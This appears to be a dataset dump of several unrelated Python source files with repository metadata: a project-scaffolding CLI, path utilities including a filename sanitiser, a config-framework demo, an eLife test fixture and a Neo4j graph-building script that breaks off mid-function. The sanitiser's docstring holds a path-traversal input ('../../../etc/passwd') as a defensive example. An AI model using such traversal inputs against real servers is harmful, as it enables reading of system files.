        "--starter",
        "-s",
        help="Use a language-specific starter template",
        case_sensitive=False,
        show_default=True,
    ),
    venv: VirtualEnv = typer.Option(
        VirtualEnv.none,
        "--venv",
        "-v",
        help="Which type of virtual environment to create for the project.",
        case_sensitive=False,
        show_default=True,
    ),
    no_git: bool = typer.Option(
        False,
        "--no-git",
        "-n",
        help="Don't initialise an empty git repo in the root of the project.",
    ),
) -> None:
    """
    Create a new development project.
    Bare usage will simply create an empty folder in your configured projects
    directory.
    You can also create a project from a cookiecutter template by passing a valid
    url to the '--cookie/-c' flag.
    If you just want a very simple, language-specific starting template, use the
    '--starter/-s' option.
    By default, pytoil will initialise an empty git repo in the folder, following
    the style of modern language build tools such as rust's cargo. You can disable
    this behaviour by setting 'init_on_new' to false in pytoil's config file
    or by passing the '--no-git/-n' flag here.
    If you want pytoil to create a new virtual environment for your project, you
    can use the '--venv/-v' flag. Standard python and conda virtual environments
    are supported.
    If the '--venv/-v' flag is used, you may also pass a list of python packages
    to install into the created virtual environment. These will be delegated to
    the appropriate tool (pip or conda) depending on what environment was created.
    If the environment is conda, the packages will be passed at environment creation
    time meaning they will have their dependencies resolved together. Normal python
    environments will first be created and then have specified packages installed.
    If 'common_packages' is specified in pytoil's config file, these will automatically
    be included in the environment.
    To specify versions of packages via the command line, you must enclose them
    in double quotes e.g. "flask>=1.0.0" not flask>=1.0.0 otherwise this will
    be interpreted by the shell as a command redirection.
    Examples:
    $ pytoil new my_project
    $ pytoil new my_project --cookie https://github.com/some/cookie.git
    $ pytoil new my_project --venv conda
    $ pytoil new my_project -c https://github.com/some/cookie.git -v conda --no-git
    $ pytoil new my_project -v venv requests "flask>=1.0.0"
    $ pytoil new my_project --starter python
    """
    # Get config and ensure user can access API
    config = Config.from_file()
    utils.warn_if_no_api_creds(config)
    # Setup the objects required
    api = API(username=config.username, token=config.token)
    repo = Repo(
        owner=config.username,
        name=project,
        local_path=config.projects_dir.joinpath(project),
    )
    code = VSCode(root=repo.local_path)
    git = Git()
    # Extra args (allow_extra_args=True above) are treated as package specs
    # and appended to the configured common_packages.
    if ctx.args:
        packages: List[str] = config.common_packages + ctx.args
    else:
        packages = config.common_packages
    # Resolve config vs flag for no-git:
    # the --no-git flag takes priority over the config file setting.
    use_git: bool = config.init_on_new and not no_git
    # Check if the project already exists locally/remotely; warns and exits if so.
    pre_new_checks(repo=repo, api=api)
    # Can't use --venv with non-python starters
    if (
        starter.value != starter.none  # User specified starter
        and starter.value != starter.python  # The starter is not python
        and venv.value != venv.none  # And the user wants a virtual environment
    ):
        # exits=1: msg.warn terminates the program here.
        msg.warn(
            f"Can't create a venv for {starter.value} project!",
            spaced=True,
            exits=1,
        )
    # If we get here, all is well and we can create stuff!
    make_new_project(
        repo=repo,
        git=git,
        cookie=cookie,
        starter=starter,
        use_git=use_git,
        config=config,
    )
    if venv.value == venv.venv:
        env = create_virtualenv(repo=repo, packages=packages)
        if config.vscode:
            msg.info(f"Opening {repo.name!r} in VSCode.", spaced=True)
            # Point the VSCode workspace at the freshly created interpreter.
            code.set_workspace_python(env.executable)
            code.open()
    elif venv.value == venv.conda:
        env = create_condaenv(repo=repo, packages=packages)
        if config.vscode:
            msg.info(f"Opening {repo.name!r} in VSCode.", spaced=True)
            code.set_workspace_python(env.executable)
            code.open()
    else:
        # Only other allowed condition is none
        typer.secho(
            "Virtual environment not requested. Skipping environment creation.",
            fg=typer.colors.YELLOW,
        )
        if config.vscode:
            msg.info(f"Opening {repo.name!r} in VSCode.", spaced=True)
            code.open()
def make_new_project(
    repo: Repo, git: Git, cookie: str, starter: Starter, use_git: bool, config: Config
) -> None:
    """
    Create a new development project either from a cookiecutter
    template, from a language-specific starter, or from scratch.

    Dispatch order: cookiecutter URL first, then the chosen starter
    (go/python/rust), otherwise an empty directory. ``use_git`` controls
    whether an empty git repo is initialised in the new project root.
    """
    # Can't use starter and cookiecutter at the same time
    if starter.value != Starter.none and cookie:
        # exits=1: msg.warn terminates the program here.
        msg.warn(
            "'--cookie' and '--starter' are mutually exclusive.",
            exits=1,
        )
    if cookie:
        # We don't initialise a git repo for cookiecutters
        # some templates have hooks which do this, mine do!
        msg.info(f"Creating {repo.name!r} from cookiecutter: {cookie!r}.")
        cookiecutter(template=cookie, output_dir=config.projects_dir)
    elif starter == Starter.go:
        msg.info(f"Creating {repo.name!r} from starter: {starter.value!r}.")
        go_st = GoStarter(path=config.projects_dir, name=repo.name)
        try:
            go_st.generate(username=config.username)
        except GoNotInstalledError:
            msg.fail("Error: Go not installed.", spaced=True, exits=1)
        if use_git:
            git.init(path=repo.local_path, check=True)
    elif starter == Starter.python:
        msg.info(f"Creating {repo.name!r} from starter: {starter.value!r}.")
        py_st = PythonStarter(path=config.projects_dir, name=repo.name)
        py_st.generate()
        if use_git:
            git.init(path=repo.local_path, check=True)
    elif starter == Starter.rust:
        # NOTE(review): unlike the go/python branches, no git init happens
        # here -- presumably because cargo initialises a repo itself; confirm.
        msg.info(f"Creating {repo.name!r} from starter: {starter.value!r}.")
        rs_st = RustStarter(path=config.projects_dir, name=repo.name)
        try:
            rs_st.generate()
        except CargoNotInstalledError:
            msg.fail("Error: Cargo not installed.", spaced=True, exits=1)
    else:
        msg.info(f"Creating {repo.name!r} at {repo.local_path}.")
        # Make an empty dir and git repo
        repo.local_path.mkdir(parents=True)
        if use_git:
            git.init(path=repo.local_path, check=True)
def pre_new_checks(repo: Repo, api: API) -> None:
    """
    Checks whether the repo already exists either locally
    or remotely, prints helpful warning messages and exits
    the program if True.

    HTTP errors from the GitHub API are routed through
    utils.handle_http_status_errors rather than handled here.
    """
    is_local = repo.exists_local()
    try:
        is_remote = repo.exists_remote(api=api)
    except httpx.HTTPStatusError as err:
        utils.handle_http_status_errors(error=err)
    else:
        # exits=1: msg.warn terminates the program in either branch.
        if is_local:
            msg.warn(
                title=f"{repo.name} already exists locally!",
                text=f"To checkout this project, use 'pytoil checkout {repo.name}'.",
                spaced=True,
                exits=1,
            )
        elif is_remote:
            msg.warn(
                title=f"{repo.name!r} already exists on GitHub!",
                text=f"To checkout this project, use 'pytoil checkout {repo.name}'.",
                spaced=True,
                exits=1,
            )
def create_virtualenv(repo: Repo, packages: List[str]) -> Environment:
    """Create a standard python venv for *repo*, install *packages* into it,
    and return the Environment handle, reporting progress to the user."""
    msg.info(
        f"Creating virtual environment for {repo.name!r}",
        text=f"Including packages: {', '.join(packages)}",
        spaced=True,
    )
    env = Venv(project_path=repo.local_path)
    # Spinner while the venv is built and packages are pip-installed.
    with msg.loading("Working..."):
        env.create(packages=packages)
    return env
def create_condaenv(repo: Repo, packages: List[str]) -> Environment:
    """
    Build a fresh conda environment for *repo* with *packages*.

    Warns and exits (code 1) if conda already has an environment of the
    same name; otherwise returns the newly created environment.
    """
    package_list = ", ".join(packages)
    msg.info(
        f"Creating conda environment for {repo.name!r}",
        text=f"Including packages: {package_list}",
        spaced=True,
    )
    conda_env = Conda(name=repo.name, project_path=repo.local_path)
    try:
        with msg.loading("Working..."):
            conda_env.create(packages=packages)
    except EnvironmentAlreadyExistsError:
        msg.warn(
            f"Conda environment {conda_env.name!r} already exists!", spaced=True, exits=1
        )
    return conda_env
| 0 | 0 | 0 |
95e1a4d230cc4ecc6e1410bd9af1d4589b983194 | 4,467 | py | Python | fserver/path_util.py | Carrotor116/fserver | 86934023fb080088854b4bae7867ad3667561111 | [
"MIT"
] | 1 | 2020-08-06T01:25:14.000Z | 2020-08-06T01:25:14.000Z | fserver/path_util.py | Carrotor116/fserver | 86934023fb080088854b4bae7867ad3667561111 | [
"MIT"
] | 1 | 2020-07-26T09:27:01.000Z | 2020-07-26T09:27:01.000Z | fserver/path_util.py | Carrotor116/fserver | 86934023fb080088854b4bae7867ad3667561111 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import re
import sys
from werkzeug import utils
try:
from os import scandir
except:
from scandir import scandir
def parents_path(path):
    """
    Return the set of all ancestor paths of *path*.

    :param path: path to inspect (normalized internally)
    :return: set of ancestor paths, each without a trailing '/'; '.' is
             included unless the top-most remaining component starts with '.'
    """
    ancestors = set()
    remainder = normalize_path(path)
    while '/' in remainder:
        # rpartition's head is everything before the last separator
        remainder = remainder.rpartition('/')[0]
        ancestors.add(remainder)
    if remainder.startswith('./') or not remainder.startswith('.'):
        ancestors.add('.')
    return ancestors
def parent_path(path):
    """
    Return the direct parent of *path*, without a trailing '/'.

    :param path: path to inspect (normalized internally)
    :return: parent path; '.' when *path* has no '/' separator
    """
    normalized = normalize_path(path)
    if '/' not in normalized:
        return '.'
    return normalized[:normalized.rindex('/')]
_filename_ascii_strip_re = re.compile(r"[^A-Za-z0-9_.-]")
_filename_ascii_add_strip_re = re.compile(r'[^A-Za-z0-9_\u4E00-\u9FBF\u3040-\u30FF\u31F0-\u31FF.-]')
_windows_device_files = (
"CON",
"AUX",
"COM1",
"COM2",
"COM3",
"COM4",
"LPT1",
"LPT2",
"LPT3",
"PRN",
"NUL",
)
PY2 = sys.version_info[0] == 2
if PY2:
text_type = unicode
else:
text_type = str
def secure_filename(filename):
    r"""Pass it a filename and it will return a secure version of it. This
    filename can then safely be stored on a regular file system and passed
    to :func:`os.path.join`.
    On windows systems the function also makes sure that the file is not
    named after one of the special device files.
    >>> secure_filename("My cool movie.mov")
    'My_cool_movie.mov'
    >>> secure_filename("../../../etc/passwd")
    'etc_passwd'
    >>> secure_filename(u'i contain cool \xfcml\xe4uts.txt')
    'i_contain_cool_umlauts.txt'
    The function might return an empty filename. It's your responsibility
    to ensure that the filename is unique and that you abort or
    generate a random filename if the function returned an empty one.
    .. versionadded:: 0.5
    :param filename: the filename to secure
    """
    # NFKD-normalize so composed accented characters decompose; the
    # UTF-8 encode/decode round-trip then drops unrepresentable bytes.
    if isinstance(filename, text_type):
        from unicodedata import normalize
        filename = normalize("NFKD", filename).encode("utf-8", "ignore")
        if not PY2:
            filename = filename.decode("utf-8")
    # Path separators become spaces so the later split/join collapses them.
    for sep in os.path.sep, os.path.altsep:
        if sep:
            filename = filename.replace(sep, " ")
    # Unlike the stock werkzeug version (commented out below), this uses
    # _filename_ascii_add_strip_re, whose character class also keeps CJK
    # ideographs and Japanese kana, so such filenames survive sanitisation.
    filename = to_unicode_str(_filename_ascii_add_strip_re.sub('', '_'.join(
        filename.split()))).strip('._')
    # filename = str(_filename_ascii_strip_re.sub("", "_".join(filename.split()))).strip(
    #     "._"
    # )
    # on nt a couple of special files are present in each folder.  We
    # have to ensure that the target file is not such a filename.  In
    # this case we prepend an underline
    if (
        os.name == "nt"
        and filename
        and filename.split(".")[0].upper() in _windows_device_files
    ):
        filename = "_" + filename
    return filename
if __name__ == '__main__':
print(os.getcwd())
| 24.955307 | 100 | 0.596597 | # -*- coding: utf-8 -*-
import os
import re
import sys
from werkzeug import utils
try:
from os import scandir
except:
from scandir import scandir
def to_unicode_str(s):
    # Coerce *s* to the interpreter's native unicode text type.
    # NOTE(review): the (3, 4) cut-off is used as the py2/py3 split;
    # `unicode` only exists on Python 2, so this would raise NameError on
    # Python 3.0-3.3 — presumably those versions are unsupported; confirm.
    if sys.version_info < (3, 4) and not isinstance(s, unicode):
        if isinstance(s, str):
            try:
                s = s.decode('utf-8')  # try UTF-8 first
            except:
                # Fallback decoding as GBK — assumes zh-CN Windows
                # byte strings; TODO confirm this is the intended locale.
                s = s.decode('gbk')
        else:
            s = unicode(s)
    elif sys.version_info >= (3, 4) and not isinstance(s, str):
        s = str(s)
    return s
def url_path_to_local_abspath(path):
    """
    Turn a URL path into a normalized absolute local path.

    '#' and '?' are intentionally NOT stripped here: inside file names
    they are literal characters, not url-encode separators.
    """
    target = '.' if path == '' else path
    return normalize_path(os.path.abspath(target))
def normalize_path(path):
    """
    Normalize *path* to forward slashes with no trailing '/'.

    The result is always the native unicode string type.
    """
    normalized = os.path.normpath(path)
    if os.sep == '\\':  # on Windows, unify separators to '/'
        normalized = normalized.replace('\\', '/')
    return to_unicode_str(normalized.rstrip('/'))
def parents_path(path):
    """
    Collect every ancestor path of *path*.

    :param path: path to inspect (normalized internally)
    :return: set of ancestors without trailing '/'; the relative root '.'
             is added unless the remaining top component starts with '.'
    """
    parents = set()
    current = normalize_path(path)
    while '/' in current:
        current = current[:current.rindex('/')]
        parents.add(current)
    if current.startswith('./') or not current.startswith('.'):
        parents.add('.')
    return parents
def parent_path(path):
    """
    Return the parent of *path* without a trailing '/'.

    Paths containing no '/' separator are children of '.'.
    """
    p = normalize_path(path)
    try:
        return p[:p.rindex('/')]
    except ValueError:  # no separator present
        return '.'
def get_filename(path):
    """Return the last component of *path* (the file or directory name)."""
    normalized = normalize_path(path)
    # rpartition yields ('', '', whole-string) when there is no '/',
    # so the tail is always the wanted component.
    return normalized.rpartition('/')[2]
def get_suffix(path):
    """Return the extension after the last '.', or '' when there is none."""
    _, dot, suffix = path.rpartition('.')
    return suffix if dot else ''
def is_child(child_path, parent_path):
    """True when *child_path* lies strictly inside *parent_path*."""
    # NOTE: the parameter name shadows the module-level parent_path()
    # inside this function body; kept for interface compatibility.
    child = normalize_path(child_path)
    parent = normalize_path(parent_path)
    return len(child) > len(parent) and child.startswith(parent + '/')
def listdir(path):
    # Thin wrapper: iterate directory entries via scandir (os.scandir on
    # py3.5+, the backport package otherwise) over a unicode-coerced path.
    return scandir(to_unicode_str(path))
_filename_ascii_strip_re = re.compile(r"[^A-Za-z0-9_.-]")
_filename_ascii_add_strip_re = re.compile(r'[^A-Za-z0-9_\u4E00-\u9FBF\u3040-\u30FF\u31F0-\u31FF.-]')
_windows_device_files = (
"CON",
"AUX",
"COM1",
"COM2",
"COM3",
"COM4",
"LPT1",
"LPT2",
"LPT3",
"PRN",
"NUL",
)
PY2 = sys.version_info[0] == 2
if PY2:
text_type = unicode
else:
text_type = str
def secure_filename(filename):
    r"""Pass it a filename and it will return a secure version of it. This
    filename can then safely be stored on a regular file system and passed
    to :func:`os.path.join`.
    On windows systems the function also makes sure that the file is not
    named after one of the special device files.
    >>> secure_filename("My cool movie.mov")
    'My_cool_movie.mov'
    >>> secure_filename("../../../etc/passwd")
    'etc_passwd'
    >>> secure_filename(u'i contain cool \xfcml\xe4uts.txt')
    'i_contain_cool_umlauts.txt'
    The function might return an empty filename. It's your responsibility
    to ensure that the filename is unique and that you abort or
    generate a random filename if the function returned an empty one.
    .. versionadded:: 0.5
    :param filename: the filename to secure
    """
    # NFKD-normalize so composed accented characters decompose; the
    # UTF-8 encode/decode round-trip then drops unrepresentable bytes.
    if isinstance(filename, text_type):
        from unicodedata import normalize
        filename = normalize("NFKD", filename).encode("utf-8", "ignore")
        if not PY2:
            filename = filename.decode("utf-8")
    # Path separators become spaces so the later split/join collapses them.
    for sep in os.path.sep, os.path.altsep:
        if sep:
            filename = filename.replace(sep, " ")
    # Unlike the stock werkzeug version (commented out below), this uses
    # _filename_ascii_add_strip_re, whose character class also keeps CJK
    # ideographs and Japanese kana, so such filenames survive sanitisation.
    filename = to_unicode_str(_filename_ascii_add_strip_re.sub('', '_'.join(
        filename.split()))).strip('._')
    # filename = str(_filename_ascii_strip_re.sub("", "_".join(filename.split()))).strip(
    #     "._"
    # )
    # on nt a couple of special files are present in each folder.  We
    # have to ensure that the target file is not such a filename.  In
    # this case we prepend an underline
    if (
        os.name == "nt"
        and filename
        and filename.split(".")[0].upper() in _windows_device_files
    ):
        filename = "_" + filename
    return filename
if __name__ == '__main__':
print(os.getcwd())
| 1,202 | 0 | 161 |
a2533bb28bfb5cd5a97367c29d9187aba0e778ce | 2,345 | py | Python | demo/framework.py | lechat/multiconf | c41cbe9ab3fb768a7d4dbd7b9f5d983b1306bde3 | [
"BSD-3-Clause"
] | null | null | null | demo/framework.py | lechat/multiconf | c41cbe9ab3fb768a7d4dbd7b9f5d983b1306bde3 | [
"BSD-3-Clause"
] | null | null | null | demo/framework.py | lechat/multiconf | c41cbe9ab3fb768a7d4dbd7b9f5d983b1306bde3 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2012 Lars Hupfeldt Nielsen, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
import sys
import os.path
from os.path import join as jp
here = os.path.dirname(__file__)
sys.path.append(jp(here, '../..'))
from multiconf import ConfigRoot, ConfigItem, ConfigBuilder
from multiconf.decorators import nested_repeatables, repeat, required
# Here we define what can be repeated within the configuration item. In this case
# we will have many managed servers and datasources
@nested_repeatables('managed_servers, datasources')
class weblogic_config(ConfigRoot):
''' This is just a simple holder of managed_servers and datasources '''
# Weblogic's standalone administration server. Used to control domain.
# Here specify that a managed_server can be repeated within it's parent (domain)
@repeat()
# Here we specify that a parameter num_servers is required when defining a
# builder for managed_server
@required('num_servers')
class managed_servers(ConfigBuilder):
''' Builder for managed_server objects. Used in environment configuration to
automatically create proper number of managed_server objects '''
@repeat()
| 41.140351 | 126 | 0.742004 | # Copyright (c) 2012 Lars Hupfeldt Nielsen, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
import sys
import os.path
from os.path import join as jp
here = os.path.dirname(__file__)
sys.path.append(jp(here, '../..'))
from multiconf import ConfigRoot, ConfigItem, ConfigBuilder
from multiconf.decorators import nested_repeatables, repeat, required
# Here we define what can be repeated within the configuration item. In this case
# we will have many managed servers and datasources
@nested_repeatables('managed_servers, datasources')
class weblogic_config(ConfigRoot):
    ''' This is just a simple holder of managed_servers and datasources '''
    def __init__(self, selected_env, valid_envs, **attr):
        # selected_env: the environment this configuration is instantiated for
        # valid_envs: all environments this configuration may be used with
        # **attr: free-form attributes forwarded to the ConfigRoot base
        super(weblogic_config, self).__init__(selected_env, valid_envs, **attr)
# Weblogic's standalone administration server. Used to control domain.
class admin_server(ConfigItem):
    ''' Weblogic standalone administration server; name and server_type are fixed to 'admin'. '''
    def __init__(self, **attr):
        super(admin_server, self).__init__(name='admin', server_type='admin', **attr)
# Here specify that a managed_server can be repeated within it's parent (domain)
@repeat()
class managed_server(ConfigItem):
    ''' A single managed server; repeatable within its parent config (server_type fixed to 'managed'). '''
    def __init__(self, name, **attr):
        super(managed_server, self).__init__(name=name, server_type='managed', **attr)
# Here we specify that a parameter num_servers is required when defining a
# builder for managed_server
@required('num_servers')
class managed_servers(ConfigBuilder):
    ''' Builder for managed_server objects. Used in environment configuration to
    automatically create proper number of managed_server objects '''
    def __init__(self, num_servers, host_pattern, base_port, **attr):
        # num_servers: how many managed_server instances build() creates
        # host_pattern: %-mapping pattern keyed on 'n' (the server number)
        # base_port: server ports are assigned as base_port + 10 + server number
        super(managed_servers, self).__init__(num_servers=num_servers, host_pattern=host_pattern, base_port=base_port, **attr)
    def build(self):
        # Invoked by the ConfigBuilder machinery to instantiate the repeated items.
        for server_num in xrange(1, self.num_servers+1):
            # Here we are generating the managed_server's name and host name, from a pattern and the managed server number
            server_name = 'ms%d' % server_num
            host_name = self.host_pattern % dict(n=server_num)
            managed_server(name=server_name, host=host_name, port=self.base_port+10+server_num)
@repeat()
class datasource(ConfigItem):
    ''' Repeatable datasource definition; attributes are free-form key/values. '''
    def __init__(self, **attr):
        super(datasource, self).__init__(**attr)
| 909 | 30 | 223 |
de2e5d6d77fa2b68900522319a74e9122be0658d | 1,585 | py | Python | tests/fixtures/test_author_contributions/content_01_expected.py | elifesciences/elife-tools | ee345bf0e6703ef0f7e718355e85730abbdfd117 | [
"MIT"
] | 9 | 2015-04-16T08:13:31.000Z | 2020-05-18T14:03:06.000Z | tests/fixtures/test_author_contributions/content_01_expected.py | elifesciences/elife-tools | ee345bf0e6703ef0f7e718355e85730abbdfd117 | [
"MIT"
] | 310 | 2015-02-11T00:30:09.000Z | 2021-07-14T23:58:50.000Z | tests/fixtures/test_author_contributions/content_01_expected.py | elifesciences/elife-tools | ee345bf0e6703ef0f7e718355e85730abbdfd117 | [
"MIT"
] | 9 | 2015-02-04T01:21:28.000Z | 2021-06-15T12:50:47.000Z | expected = [
{
"id": "con1",
"text": "<p>RAA, Conception and design, Acquisition of data, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con2",
"text": "<p>LWB, Conception and design, Acquisition of data, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con3",
"text": "<p>CS, Acquisition of data, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con4",
"text": "<p>RKD, Acquisition of data, Analysis and interpretation of data</p>",
"fn-type": "con",
},
{
"id": "con5",
"text": "<p>RZ, Acquisition of data, Analysis and interpretation of data</p>",
"fn-type": "con",
},
{
"id": "con6",
"text": "<p>SRF, Acquisition of data, Analysis and interpretation of data</p>",
"fn-type": "con",
},
{
"id": "con7",
"text": "<p>JC, Conception and design, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con8",
"text": "<p>NK, Conception and design, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con9",
"text": "<p>NISC Comparative Sequencing Program: JM did X, IM did Y and JB did Z and Y</p>",
"fn-type": "con",
},
]
| 33.020833 | 144 | 0.529968 | expected = [
{
"id": "con1",
"text": "<p>RAA, Conception and design, Acquisition of data, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con2",
"text": "<p>LWB, Conception and design, Acquisition of data, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con3",
"text": "<p>CS, Acquisition of data, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con4",
"text": "<p>RKD, Acquisition of data, Analysis and interpretation of data</p>",
"fn-type": "con",
},
{
"id": "con5",
"text": "<p>RZ, Acquisition of data, Analysis and interpretation of data</p>",
"fn-type": "con",
},
{
"id": "con6",
"text": "<p>SRF, Acquisition of data, Analysis and interpretation of data</p>",
"fn-type": "con",
},
{
"id": "con7",
"text": "<p>JC, Conception and design, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con8",
"text": "<p>NK, Conception and design, Analysis and interpretation of data, Drafting or revising the article</p>",
"fn-type": "con",
},
{
"id": "con9",
"text": "<p>NISC Comparative Sequencing Program: JM did X, IM did Y and JB did Z and Y</p>",
"fn-type": "con",
},
]
| 0 | 0 | 0 |
9948e1f94b91f2d4c8102e9952d01a6734aedda2 | 8,348 | py | Python | dev/BuildGraph.py | galadrielbriere/ClustOmics | af3d6aae878483f6401c06ef50a7eb78e1e76917 | [
"MIT"
] | 2 | 2021-05-16T18:16:03.000Z | 2021-06-02T07:28:44.000Z | dev/BuildGraph.py | galadrielbriere/ClustOmics | af3d6aae878483f6401c06ef50a7eb78e1e76917 | [
"MIT"
] | null | null | null | dev/BuildGraph.py | galadrielbriere/ClustOmics | af3d6aae878483f6401c06ef50a7eb78e1e76917 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 25 13:08:45 2019
@author: briere
"""
import logging
import argparse
import os
from neo4j import GraphDatabase
descr = ('This script instanciate a Neo4j graph database from the metadata '
'file and the various clustering results to integrate.')
parser = argparse.ArgumentParser(description=descr)
parser.add_argument("-id", "--neo_id", help="Neo4j ID used to connect to the database")
parser.add_argument("-pwd", "--neo_pwd", help="Neo4j password used to connect to the database")
parser.add_argument("-host", "--neo_localhost", help="Neo4j graph localhost")
parser.add_argument("-cls", "--clustering_folder", help="Path to directory containing clustering "
"results files and metadata file \n Please note that cluster files must be "
"names following the pattern : {SUBJECT}_{DATATYPE}_{METHOD}.clst \n"
"The metadata file must be names following the pattern : "
"{SUBJECT}_metadata.txt \n Please, read the docs to make sure your "
"files respect the mandatory format.")
parser.add_argument("-subj", "--subject", help="Analysis subject")
parser.add_argument("-out", "--log_out", help="Log file")
args = parser.parse_args()
neo_id = args.neo_id
neo_pwd = args.neo_pwd
neo_localhost = args.neo_localhost
results_path = args.clustering_folder
subject = args.subject
log_file = args.log_out
logging.basicConfig(filename=log_file, level=logging.INFO, format='%(message)s')
logging.info('Loading results from %s in %s \n' % (subject, results_path))
def make_graph(results_path, subject, driver):
    '''
    Parameters
    ----------
    results_path : STRING
        Path to folder containing raw clustering results.
    subject : STRING
        Subject of analysis (e.g: AML to run the analysis form AML cancer).
    driver : neo4j driver
        Open connection used for all graph writes.
    Returns
    -------
    Log file. Instanciates the graph database with data from metadata file
    and clustering results files.
    '''
    subject_dir = os.path.join(results_path, subject)
    entries = os.listdir(subject_dir)
    # Exactly one metadata file is expected per subject directory.
    metadata_file = [entry for entry in entries if "metadata" in entry][0]
    logging.info('Initiating graph from %s metadata.', metadata_file)
    create_object_nodes(os.path.join(subject_dir, metadata_file), subject, driver)
    # Clustering files follow the {SUBJECT}_{DATATYPE}_{METHOD}.clst pattern.
    for stem in (entry[0:-5] for entry in entries if entry.endswith(".clst")):
        parts = stem.split('_')
        datatype, method = parts[1], parts[2]
        clust_path = os.path.join(subject_dir, stem + '.clst')
        logging.info('Loading %s clustering results.', clust_path)
        logging.info('- computed on datatype : %s', datatype)
        logging.info('- computed with method : %s', method)
        create_cluster_nodes(clust_path, subject, datatype, method, driver)
def create_object_nodes(metadata_file, subject, driver):
    '''
    Parameters
    ----------
    metadata_file : STRING
        Path to metadata file. Must be named as follow:
            {SUBJECT}_metadata.txt
    subject : STRING
        Subject of analysis (e.g: AML to run the analysis form AML cancer).
    driver : neo4j driver
        Open connection; a session is created and always closed here.
    Returns
    -------
    Instanciate graph with data from metadata file.
    metadata_file : rows = "obects" nodes ids
                  cols = metadata nodes ids (with header as node names)
    On first line, for each column, specify how it should be represented in the graph:
        - "main_nodes" for the objects to cluster (e.g Patients TCGA id)
        - as a node linked to main_nodes: "node"
        - as a label of main_nodes: "label"
        - as a property of main nodes : "prop"
    NOTE: Cypher is built by string concatenation; ids, labels and values
    from the metadata file are not escaped. Only feed trusted input files.
    '''
    print("Instanciating graph for " + subject + "from metadata file : " + metadata_file)
    print("Check the graph in your Neo4j browser by querying : \n" +
          "MATCH (o:" + subject + ") RETURN o LIMIT 100")
    graph = driver.session()
    try:
        with open(metadata_file) as file:
            # First header line: representation keyword of each metadata column.
            col_types = file.readline().strip().split('\t')
            for col_type in col_types[1:]:
                if col_type not in ('label', 'node', 'property'):
                    logging.error('Error : Wrong column type. Must be "label",'
                                  '"node" or "property". Please, modify the metadata file. \n')
            # Second header line: column names; first column is the main node type.
            col_names = file.readline().strip().split('\t')
            main_node = col_names[0]
            for raw_line in file:
                line = raw_line.strip()
                if not line:
                    # Robustness fix: a trailing blank line used to create
                    # a main node with an empty id.
                    continue
                data = line.split('\t')
                # Create object node
                node_id = data[0]
                node = "(o:" + subject + ":" + main_node + "{id:'" + node_id + "'})"
                graph.run("MERGE" + node)
                # Attach metadata as property / label / linked node
                for i in range(1, len(data)):
                    if col_types[i] == "property" and data[i] != '':
                        graph.run("MATCH" + node + "SET o." + col_names[i] + "='" + data[i] + "'")
                    elif col_types[i] == "label" and data[i] != '':
                        graph.run("MATCH" + node + "SET o:" + data[i])
                    elif col_types[i] == "node" and data[i] != '':
                        meta_node = "(m:" + col_names[i] + "{id:'" + data[i] + "'})"
                        graph.run("MERGE" + meta_node)
                        meta_rel = "[r:" + col_names[i] + "]"
                        graph.run("MATCH" + node + " MATCH" + meta_node +
                                  " CREATE (o)-" + meta_rel + "->(m)")
                    elif col_types[i] not in ["property", "label", "node"]:
                        logging.info('"%s" is not a valid keyword.', col_types[i])
                        logging.info('Please use "property", "label" or "node". Skipping.')
                        # Bug fix: the original ended this branch with the bare
                        # expression `next` (the builtin), which does nothing;
                        # explicitly skip the invalid column instead.
                        continue
    finally:
        # Bug fix: the session is now closed even if parsing or a query fails.
        graph.close()
def create_cluster_nodes(clust_file, subject, datatype, method, driver):
    '''
    Parameters
    ----------
    clust_file : STRING
        Path to a raw clustering result file. This file must be named as follow:
            {SUBJECT}_{DATATYPE}_{METHOD}.clst
    subject : STRING
        Subject of analysis (e.g: AML to run the analysis form AML cancer).
    datatype : STRING
        Datatype used to compute this clustering.
    method : STRING
        Method used to compute this clustering.
    driver : neo4j driver
        Open connection; a session is created and always closed here.
    Returns
    -------
    Compute edges between main_nodes and their respective cluster nodes.
    '''
    graph = driver.session()
    try:
        with open(clust_file) as file:
            # Header line: first column names the main node type,
            # second column names the cluster node type.
            header = file.readline().strip().split('\t')
            main_node = header[0]
            clust_node = header[1]
            clust_labels = ":".join([clust_node, subject, datatype, method])
            id_base = "_".join([subject, datatype, method])
            print("Loading input clustering results for " + subject + "from file: " + clust_file)
            print("Check the graph in your Neo4j browser by querying : \n" +
                  "MATCH (o:" + main_node + ":" + subject + ")-[r:PART_OF]-(c:"+\
                  clust_labels + ") RETURN * LIMIT 100")
            for raw_line in file:
                if not raw_line.strip():
                    # Robustness fix: a trailing blank line used to raise
                    # IndexError on the cluster-number column.
                    continue
                fields = raw_line.split('\t')
                node_id = fields[0]
                clust_nb = fields[1].strip()
                clust_id = id_base + "_" + clust_nb
                node = "(o:" + subject + ":" + main_node + "{id:'" + node_id + "'})"
                clust = "(c:" + clust_labels + "{id:'" + clust_id + "'})"
                graph.run("MERGE" + clust)
                graph.run("MATCH" + clust + " MATCH" + node +
                          " CREATE (o)-[:PART_OF]->(c)")
    finally:
        # Bug fix: close the session even when reading or a query fails.
        graph.close()
def main():
    '''
    Entry point.

    Connects to Neo4j using the module-level CLI arguments
    (neo_id, neo_pwd, neo_localhost) and builds the graph from the
    metadata and raw clustering files under results_path/subject.
    The original docstring documented parameters, but main() takes none.
    '''
    driver = GraphDatabase.driver(uri=neo_localhost, auth=(neo_id, neo_pwd))
    try:
        make_graph(results_path, subject, driver)
    finally:
        # Bug fix: the driver is now closed even if graph construction fails.
